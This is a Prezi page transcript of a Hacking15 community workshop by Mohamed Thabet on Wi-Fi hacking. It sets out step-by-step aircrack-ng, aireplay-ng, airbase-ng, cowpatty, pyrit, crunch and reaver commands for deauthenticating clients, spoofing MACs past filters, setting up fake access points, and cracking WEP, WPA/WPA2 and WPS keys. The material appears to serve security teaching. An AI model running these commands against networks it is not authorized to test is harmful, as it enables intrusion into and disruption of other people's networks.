Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

WiFu Wi-Fi Hacking Tools Hacking15

يعقد مجتمع هاكنج15 ورشة واي فو – واي فاى هاكنج “كيف تخترق تخترق شبكات الواي فاي يوم السبت 19/3
by

Mohamed Thabet

on 4 April 2014

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of WiFu Wi-Fi Hacking Tools Hacking15

WiFu Wi-Fi Hacking Tools Hacking15
WEP
WPA/WPA-2
Agenda
Tools
- Kali Setup
- Wireless Card & Channels
- Airecrack-ng Package
- Wireshark
- Wifite/Reaver
WPA/WPA-2
- Understanding WPA/WPA2
- WPA/WPA2 Cracking
- Create Password List (Dictionary)
- After Cracking
Tools
Kali Setup
Wireless Card & Channels
Airecrack-ng Package
WireShrke
Dissecting Ap-Client Connections
WEP
- Understanding WEP
- WEP Cracking
- Mac Filtering
Alfa Wi-Fi Network Adapter
Wi-Fi Channels
Channel Over The World
Graphical representation of 2.4 GHz band channels overlapping
Airmon-ng
#ifconfig
#iwconfig
#airmon-ng start wlan0
#airmon-ng stop mon0
#iwconfig wlan0 channel 5
#iwconfig mon0 channel 1
# macchanger -m NewMAC
# airodump-ng mon0
# airodump-ng mon0 --channel 1
# airodump-ng mon0 -w data mon0
# airodump-ng -r data-01.cap
# airodump-ng --encrypt WEP/WPA/WPA-2 mon0
# airodump-ng --bssid AA:AA:AA:AA:AA:AA mon0
Airodump-ng
Airgraph-ng
The following creates a Client to Access point Relationship Graph
# airgraph-ng -i demo.csv -o demo.png -g CAPR
The following creates a Client to Probe Request Graph
# airgraph-ng -i demo.csv -o demo.png -g CPG
basic deauth
# aireplay-ng --deauth 0 -a AA:AA:AA:AA:AA:AA mon0
broadcast deauth
# aireplay-ng --deauth 5 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB mon0
Aireplay-ng
Broudcast With Encryption
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 mon0
Broudcast with Encryption WPA ....
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 -z 2 mon0
Airbase-ng
Aircrack-ng
Hidden SSIDs
Client - Ap
Open System
There is 2 way to know the SSID
Passive
Monitor air for new client try to associate with the AP
Active
De-Authenticate one or all clients and monitor re-connections
AP-Client State Machine
MAC Filter
Without MAC Filter
# aireplay-ng --fakeauth 10 -e Hacking15 mon0
it will Seccess :)

With MAC Filter
# aireplay-ng --fakeauth 10 -e Hacking15 mon0
it will Failed :(
We will use Mac for Authorized User
# aireplay-ng --fakeauth 10 -e Hacking15 -h AA:AA:AA:AA:AA:AA mon0
It will Seccess :)
Broudcast With Encryption
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid
Hacking15 -c 1 mon0
Broudcast with Encryption WPA ....
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 -z 2 mon0
Airbase-ng (HoneyPot )
Understanding WEP
WEP Cracking
#aircrack-ng data-01.cap
#aircrack-ng data-01.cap -w dic
Step 1
# airodump-ng mon0 --bssid AA:AA:AA:AA:AA:AA wep_1
Step 2
# aircrack-ng wep_1-01.cap
Case I
Step 1
# airodump-ng mon0 -w wep
aireplay-ng --fakeauth 0 -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB mon0
Step 2
# aireplay-ng --arpreplay -b AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB mon0
Step 3
# aircrack-ng wep-01.cap
Case II
Case III
#wifite
Create Password List (Dictionary)
Understanding WPA/WPA2
WPA/WPA2 Cracking
After Cracking
Genrate PasswordList
# crunch 8 8 1234567890 > List_1
#crunch 8 8 1234567890 -t 012@@@@@@ > List_2
Different between WPA-PSK and WPA2-PSK
check the eapol packet
WPA-PSK
HMAC-MD5 for MIC and RC4 for encryption

WPA2-PSK
HMAC-SHA1 for MIC and AES for encryption
# airdecap -e Hacking15 -p 123456 Hacking15-01.cap
# airdecap -e Hacking15 -p 123456 Hacking15-01.cap -b AA:AA:AA:AA:AA:AA
Decrypt Packet
Wireshark
Wireshark
Wireshark

# aircrack-ng WPA-01.cap
# aircrack-ng WPA-01.cap -w dic
# cowpatty -f dic -r hacking15-01-.cap -s Hacking15
# genpmk -f dic -s Hacking15 -d dic-pre-computed-pmks
# cowpatty -d dic-pre-computed-pmks -s Hacking15 -r WPA-01.cap
Speed WPA/WPA2 Cracking
# pyrit -r wpa-01.cap analyze
# pyrit -r wpa-01.cap -i dic-pre-computed-pmks attack_cowpatty
# airolib-ng PMK-Airolib --import dic-pre-computed-pmks
# aircrack -r PMK-Airolib wpa-01.cap
Block Digram
Cracking
# wash -i wlan0 -c 7 -C s
# reaver -i mon0 -b MAC --fail-wait=360
# wifite
WiFu Wi-Fi Hacking
Mohamed Thabet
Thabet@Hacking15.org
WPS
100,000,000 unique keys
with a brute force speed of 1 key/second, we are looking at 1,157 days to crack the WPS key.
brute force
reaver-wifite
WPA/WPA2 Enterprise
Understanding
Cracking
- Dissecting Ap-Client
Connections
- Hidden SSIDs
Other
- Dissecting Ap-Client
Connections
- Hidden SSIDs
- Honeypot
Intro
http://www.hacking15.org
https://www.facebook.com/hacking15
https://twitter.com/hacking15
https://plus.google.com/u/0/+Hacking15Org
Full transcript